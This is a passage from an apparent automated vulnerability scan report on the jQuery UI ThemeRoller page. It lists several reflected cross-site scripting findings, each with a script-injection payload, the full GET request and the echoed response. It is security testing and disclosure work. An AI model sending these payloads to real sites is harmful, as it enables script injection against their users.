onColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF1de03"><script>alert(1)</script>591a2eed492&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8
...[SNIP]...

3.42. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29e98"><script>alert(1)</script>00c7bbe14b6 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B1000029e98"><script>alert(1)</script>00c7bbe14b6&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:22 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B1000029e98"><script>alert(1)</script>00c7bbe14b6&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&
...[SNIP]...

3.43. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6583"><script>alert(1)</script>bd50e49b25f was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDDc6583"><script>alert(1)</script>bd50e49b25f&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDDc6583"><script>alert(1)</script>bd50e49b25f&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AA
...[SNIP]...

3.44. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7663a"><script>alert(1)</script>6663ea94d2a was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D9367663a"><script>alert(1)</script>6663ea94d2a&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
mgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D9367663a"><script>alert(1)</script>6663ea94d2a&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgT
...[SNIP]...

3.45. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98ea6"><script>alert(1)</script>bc04b692349 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF98ea6"><script>alert(1)</script>bc04b692349&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF98ea6"><script>alert(1)</script>bc04b692349&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC
...[SNIP]...

3.46. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efcfe"><script>alert(1)</script>d490bc83fc4 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7pxefcfe"><script>alert(1)</script>d490bc83fc4&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7pxefcfe"><script>alert(1)</script>d490bc83fc4&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

3.47. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c97b"><script>alert(1)</script>605cd6750bd was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*9c97b"><script>alert(1)</script>605cd6750bd HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
y=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*9c97b"><script>alert(1)</script>605cd6750bd" type="text/css" media="all" />
...[SNIP]...

3.48. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75c53"><script>alert(1)</script>42cd52ca697 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC75c53"><script>alert(1)</script>42cd52ca697&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC75c53"><script>alert(1)</script>42cd52ca697&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=F
...[SNIP]...

3.49. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b577"><script>alert(1)</script>b9dabb1f883 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=6666661b577"><script>alert(1)</script>b9dabb1f883&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=6666661b577"><script>alert(1)</script>b9dabb1f883&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTex
...[SNIP]...

3.50. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c2eb"><script>alert(1)</script>b514358f553 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF3c2eb"><script>alert(1)</script>b514358f553&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOver